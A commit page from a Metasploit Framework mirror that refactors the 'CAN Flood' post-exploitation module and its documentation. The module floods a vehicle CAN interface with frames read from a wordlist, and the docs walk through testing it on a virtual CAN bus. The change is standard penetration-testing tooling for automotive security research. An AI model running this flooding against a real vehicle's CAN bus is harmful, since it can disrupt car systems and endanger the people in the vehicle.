infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up module

master
William Vu 2019-04-01 12:04:31 -05:00
parent 2afd27a671
commit f5f4c4bec2
3 changed files with 37 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
data/wordlists/frameListCanBus.txt → data/wordlists/can_flood_frames.txt
View File

14
documentation/modules/post/hardware/automotive/can_flood.md
View File

@ -1,13 +1,18 @@
## Introduction ## Introduction
CAN Flood is a post-exploitation module that floods a CAN interface for a number of rounds. Both the interface and the number of rounds are to be provided as inputs. An example list of frames also is part of the inputs, and sources the flooding at each round. The module therefore is general as it is parametric in the frame list. CAN Flood is a post-exploitation module that floods a CAN interface for a number of rounds. Both the interface and the number of rounds are to be provided as inputs. An example list of frames also is part of the inputs, and sources the flooding at each round. The module therefore is general as it is parametric in the frame list.
## Verification Steps ## Verification Steps
First, start up a virtual CAN bus: First, start up a virtual CAN bus:
1. `sudo modprobe can` 1. `sudo modprobe can`
2. `sudo modprobe vcan` 2. `sudo modprobe vcan`
3. `sudo ip link add dev vcan0 type vcan` 3. `sudo ip link add dev vcan0 type vcan`
4. `sudo ip link set up vcan0` 4. `sudo ip link set up vcan0`
Then do the thing: Then do the thing:
5. Start `msfconsole` 5. Start `msfconsole`
6. `use auxiliary/server/local_hwbridge` 6. `use auxiliary/server/local_hwbridge`
7. `set uripath trycanbus` 7. `set uripath trycanbus`
@ -19,21 +24,26 @@ Then do the thing:
13. `set canbus vcan0` 13. `set canbus vcan0`
14. `set session 1` 14. `set session 1`
15. `run` 15. `run`
## Options ## Options
**CANBUS** **CANBUS**
Determines which CAN interface to use. Determines which CAN interface to use.
**FRAMELIST** **FRAMELIST**
Path of the file that contains the list of frames. Default is "/usr/share/metasploit-framework/data/wordlists/frameListCanBus.txt". Path of the file that contains the list of frames. Default is "/usr/share/metasploit-framework/data/wordlists/can_flood_frames.txt".
**ROUNDS** **ROUNDS**
Number of executed rounds. Default is 200. Number of executed rounds. Default is 200.
**SESSION** **SESSION**
The session to run this module on. The session to run this module on.
## Scenarios ## Scenarios
The user must know a list of frames that generate an effect on the car. This is because the module is general as it is parametric in the frame list. The user must know a list of frames that generate an effect on the car. This is because the module is general as it is parametric in the frame list.
You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output: You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output:
``` ```
msf5 > use auxiliary/server/local_hwbridge msf5 > use auxiliary/server/local_hwbridge
msf5 auxiliary(server/local_hwbridge) > run msf5 auxiliary(server/local_hwbridge) > run
@ -64,4 +74,4 @@ msf5 post(hardware/automotive/can_flood) > run
[*] -- FLOODING -- [*] -- FLOODING --
[*] Post module execution completed [*] Post module execution completed
``` ```

47
modules/post/hardware/automotive/can_flood.rb
View File

@ -2,38 +2,41 @@
# This module requires Metasploit: https://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
class MetasploitModule < Msf::Post class MetasploitModule < Msf::Post
DEFAULT_FRAMELIST = File.join(Msf::Config.data_directory, 'wordlists', 'can_flood_frames.txt')
def initialize(info = {}) def initialize(info = {})
super( super(update_info(info,
update_info( 'Name' => 'CAN Flood',
info, 'Description' => 'This module floods a CAN interface with supplied frames.',
'Name' => 'CAN Flood', 'Author' => 'Pietro Biondi',
'Description' => 'Module that floods a CAN interface', 'License' => MSF_LICENSE,
'License' => MSF_LICENSE, 'Platform' => 'hardware',
'Author' => ['Pietro Biondi'], 'SessionTypes' => ['hwbridge']
'Platform' => ['hardware'], ))
'SessionTypes' => ['hwbridge']
) register_options([
) OptString.new('CANBUS', [true, 'CAN interface']),
register_options( OptString.new('FRAMELIST', [true, 'Path to frame list file', DEFAULT_FRAMELIST]),
[ OptInt.new('ROUNDS', [true, 'Number of executed rounds', 200])
OptInt.new('ROUNDS', [false, 'Number of executed rounds', 200]), ])
OptString.new('CANBUS', [false, 'CAN interface', nil]),
OptString.new('FRAMELIST', [true, 'Path to FRAMELIST', ::File.join(Msf::Config.data_directory, 'wordlists', 'frameListCanBus.txt')])
]
)
end end
def run def run
vprint_status("Reading frame list file: #{datastore['FRAMELIST']}") unless File.exist?(datastore['FRAMELIST'])
unless ::File.exist? datastore['FRAMELIST'] print_error("Frame list file '#{datastore['FRAMELIST']}' does not exist")
print_error "Frame list file '#{datastore['FRAMELIST']}' does not exist"
return return
end end
vprint_status("Reading frame list file: #{datastore['FRAMELIST']}")
frames = File.readlines(datastore['FRAMELIST']).map { |line| line.strip.split('+') } frames = File.readlines(datastore['FRAMELIST']).map { |line| line.strip.split('+') }
print_status(' -- FLOODING -- ') print_status(' -- FLOODING -- ')
datastore['ROUNDS'].times do datastore['ROUNDS'].times do
frames.each_index { |i| client.automotive.cansend(datastore['CANBUS'], frames[i][0], frames[i][1]) } frames.each { |frame| client.automotive.cansend(datastore['CANBUS'], frame[0], frame[1]) }
end end
end end
end end